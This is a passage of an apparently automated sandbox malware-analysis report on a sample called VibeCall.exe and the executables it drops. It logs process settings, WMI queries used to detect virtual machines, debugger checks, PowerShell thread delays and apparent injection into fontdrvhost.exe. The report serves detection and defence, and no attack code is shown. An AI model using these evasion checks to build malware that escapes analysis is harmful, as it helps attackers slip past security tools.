                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 4D3B83A
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 570B83A
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 561B83A
                      Source: C:\Users\user\Desktop\VibeCall.exeMemory allocated: 18C15A90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\VibeCall.exeWindow / User API: threadDelayed 709Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeWindow / User API: threadDelayed 366Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeWindow / User API: threadDelayed 7938Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6499Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3205Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4742Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1304Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1515
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8078
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeAPI coverage: 0.0 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep count: 6499 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep count: 3205 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7276Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep count: 4742 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356Thread sleep count: 1304 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7416Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep count: 1515 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep count: 8078 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: powershell.exe, 00000004.00000002.1880930127.000001DC748E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
                      Source: contry_solution_vibecall_e.exe, 0000000F.00000003.2479874720.0000000003C80000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: VibeCall.exe, 00000000.00000003.2041460055.000001CCB612F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: contry_solution_vibecall_e.exe, 0000000F.00000003.2479874720.0000000003C80000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_013B4ED5 LdrInitializeThunk,VirtualFree,14_3_013B4ED5
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_013B7D4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_3_013B7D4D
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_01640277 mov eax, dword ptr fs:[00000030h]14_3_01640277
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_2_01640277 mov eax, dword ptr fs:[00000030h]14_2_01640277
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 15_3_02F20277 mov eax, dword ptr fs:[00000030h]15_3_02F20277
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 15_2_02F20277 mov eax, dword ptr fs:[00000030h]15_2_02F20277
